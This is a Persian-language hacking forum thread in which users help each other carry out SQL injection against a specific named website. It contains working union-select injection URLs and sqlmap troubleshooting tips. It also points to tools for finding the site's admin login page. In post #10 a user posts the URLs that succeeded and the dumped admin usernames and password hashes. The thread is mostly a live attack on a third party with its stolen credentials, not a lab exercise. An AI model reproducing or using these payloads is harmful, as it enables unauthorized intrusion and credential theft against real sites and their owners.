SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

sql ::::::::

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    sql ::::::::

    با سلام :
    دوستان من دو تا سوال دارم :
    1= این تارگت رو دوستان تست بزنن بگن تو این مرحله واسه دیدن پو شه آی دی و پس باید چه کار کرد :
    [php] http://www.petermadros.net/gr/newsdetail.php?id=1+union+select+1,2,3,group_conca t%28column_name%29,5,6,7,8,9,10,11+from+informatio n_schema.columns+where+table_name=CHAR%2898,%2097, %20115,%20101,%2095,%20117,%20115,%20101,%20114%29-- [/php]

    دوستان من با sqlmap bt 5r3 تست می زنم می خوام دامپ بگیرم آنیبل می ده /////////
    2= وقتی رمزو و یوزر رو در آوردیم پیج لاگین رو از کجا پیدا کنیم (من همه اینا رو می زنم admin, phpmyadmin.ad,cp,cpanel, و کلی چیزه دیگه ) برنامه خاصی یا سایتی نیست که اوتومات سرچ کنه و صفه لاگین رو پیدا کنه ؟

    ==================================================
    با تشگر از همه دوستان ----
    برچسب ها: هیچ یک
  • #2
    RE: sql ::::::::

    دیتابیس و تیبل و کلومن ها مورد استفاده:

    [align=center][/align]

    dump login:

    [align=center][/align]

    dump password :


    [align=center][/align]
    [align=center]وما توفيقي الا بالله

    نظر

    • #3
      RE: sql ::::::::

      آقا تشکر از این که سری جواب میدی ............................
      لایک داشی .............
      فقط چرا واسه من جواب نمی ده به خاطر سرعته پایینه منه یا چزه دیگه............
      دستوره دیگه ای هم داره مگه یعنی مثلا با بایپس کردن تو sqlmap دارم می گما :
      دیتابیس نیم و تیبل نیم و کلومن نیمو -- دامپ دیگه :؟؟؟؟؟؟؟؟
      چرا نمی شه پس ......
      ==========================
      بعد یه چی دیگه می شه دستی هم مرحله آخر رو بزنی ؟
      با تشکر از شما ................
      =============================
      ادمین فایندر هم اگه می شه توضیخ بدین هم ماله بک ترکو هم اگه روش خاصی داره ...............
      ===================================

      نظر

      • #4
        RE: sql ::::::::

        دستورات رو چگونه وارد میکنید؟

        تک تک دستورات رو بزارید.


        برای پیدا کردن ادمین پیج از برنامه IRH Admin finder استفاده کنید:
        [php]
        http://irh-admin-finder.software.informer.com/
        [/php]
        [align=center]وما توفيقي الا بالله

        نظر

        • #5
          RE: sql ::::::::

          با زم سلام ........................
          آقا اینایی که من می زنم :

          ============================
          اینام ریپورتا :




          ====================================
          فقط دامپ نمی ده اینو می زنه :


          ==============================================
          بازم لایک .................................................. ................
          ==============================================
          بعد به غیر از این برنامه ادمین فایندر کارخ دیگه نمی شه کرد ؟

          نظر

          • #6
            RE: sql ::::::::

            ببینید شما در تصویر زیر :

            [align=center][/align]

            در سطر اخر اگر دقت کنید سویچ معرفی column رو با حروف کوچک دادین و مشکل از همین جاست.

            دستور سویچ باید این طوری باشه: C-

            احتمالا مشکل حل میشه.
            [align=center]وما توفيقي الا بالله

            نظر

            • #7
              RE: sql ::::::::

              دمت گرم حل شد ............................................
              ==============================================
              فقط مردونه می دونم دیگا واقغا هم سوالا زیاد شد هم شاید اسن اسپم بسه ولی میشه خالا دستی هم این تارگت رو بزنید ...........
              و یو آر ال ها شو بزارید
              می خوام ببنم مرحله آخر رو چطور بایپس می کنید ......................
              هدفم این تارگت نیست واسه تمرین دارم کار می کنم ................................
              ================================================== =========
              ممنون از شما دوست عزیز ..............

              نظر

              • #8
                RE: sql ::::::::

                با وجود این همه امکانات نیازی به روش دستی نیست!
                [align=center]وما توفيقي الا بالله

                نظر

                • #9
                  RE: sql ::::::::

                  نیاز به روش دستی هست !

                  درسته ابزار ها و ... کار ما رو راحت تر و تقریبا اتوماتیک میتونند ولی ارزشی که اینجکت دستی داره اینجکت با ابزار ها نداره !
                  این ابزار ها شاید بایپس کمی در دیتابیس خود داشته باشند ولی هیچوقت عقل و اراده ندارند که خودشون چیزی رو بایپس کنند . یادمه یکبار یه تارگت رو هویج نتونست اینجکت کنه ولی خودم با یکم ور رفتن با دستورات بایپسش کردم ! باید خودمون دستی کار کنیم تا بتونیم با این ابزار ها هم کنار بیایم و روش کارشون رو بدونیم !
                  پس از نظر وقت و ... با ابزار ولی در کل دستی بهتره !
                  موفق باشید .
                  Nobody Can Give You Freedom ...

                  نظر

                  • #10
                    RE: sql ::::::::

                    سلام دوسته عزیز .............
                    پس شما لطف کن تارگت بالایی رو تست بزنید و مرحله آخر رو بایپس کنید ما ببینیم چه طوریه ؟
                    ====================
                    باتشکر
                    [hr]
                    با زم سلام ..............
                    دیگه نمی خواد خودم زدم :
                    [php]http://www.petermadros.net/gr/newsdetail.php?id=-1/**/union/**/select/**/1,2,3,group_concat%28id,0x3a,password%29,5,6,7,8,9 ,10,11/**/from/**/base_user--[/php]

                    =================================================
                    id $ pass:
                    2:986dd88ddc987286028fa116427e7ede,33:e5c5d1bf6a2a 2245e7378f35668b1c09
                    -================================================== ========
                    http://www.petermadros.net/gr/newsdetail.php?id=-1/**/union/**/select/**/1,2,3,group_concat%28id,0x3a,login,0x3a,password%2 9,5,6,7,8,9,10,11/**/from/**/base_user--
                    ================================================== ========================
                    2:admin:986dd88ddc987286028fa116427e7ede,33:wwwpet er:e5c5d1bf6a2a2245e7378f35668b1c09


                    با تشکر

                    نظر

                    • #11
                      RE: sql ::::::::

                      درود



                      .برا ادمین فیندر در بک ترک یک سرچ کوچلو تو خود سایت میزدی آموزش تو سایت هست
                      http://iranhack.com/acc/thread-281.html
                      علاوه بر بکترک
                      از نرم افزار هویج
                      سایت انلاین
                      http://sc0rpion.ir/af/
                      http://scan.subhashdasyam.com/admin-panel-finder.php
                      واسکریپ که به زبان pl هستش
                      و
                      نرم افزار Admin Page Finder
                      http://iranhack.com/acc/thread-1517.html

                      لطفا این نوع سوال ابتدایی تو خود سایت سرچ کنید پیدا میشه
                      با تشکر بسته شد
                      بعد امدن از مسافرت آموزش توپی rceکردم منتظر باشید
                      سلامتی اونی که حرمت نون و نمک حالیشه ... سلامتی رفیقی حکمه رفاقتشو با جوهر معرفت امضا میکنن نه با جوهر خیانت ...سلامتی رفیقی که شریکه روزهای تنگه .. نه رفیقی که فقط تو روزهای قشنگه
                       

                      نظر

                      قبلی template بعدی
                      صبر کنید ..
                      X